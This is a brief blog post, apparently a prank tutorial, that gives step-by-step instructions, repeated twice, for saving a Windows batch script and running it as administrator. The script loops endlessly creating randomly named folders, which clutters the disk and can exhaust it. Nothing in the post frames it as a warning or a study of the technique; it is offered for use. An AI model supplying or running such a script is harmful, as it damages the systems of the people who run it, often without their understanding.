steps:
1.copy & paste the below code into notepad.
2.save file as file name.bat.
3.run file as run as administrator by right clicking on file.
code:
@echo off
:top
md %random%
goto top
above code which create infinite folders within seconds.
1.copy & paste the below code into notepad.
2.save file as file name.bat.
3.run file as run as administrator by right clicking on file.
code:
@echo off
:top
md %random%
goto top
above code which create infinite folders within seconds.
No comments:
Post a Comment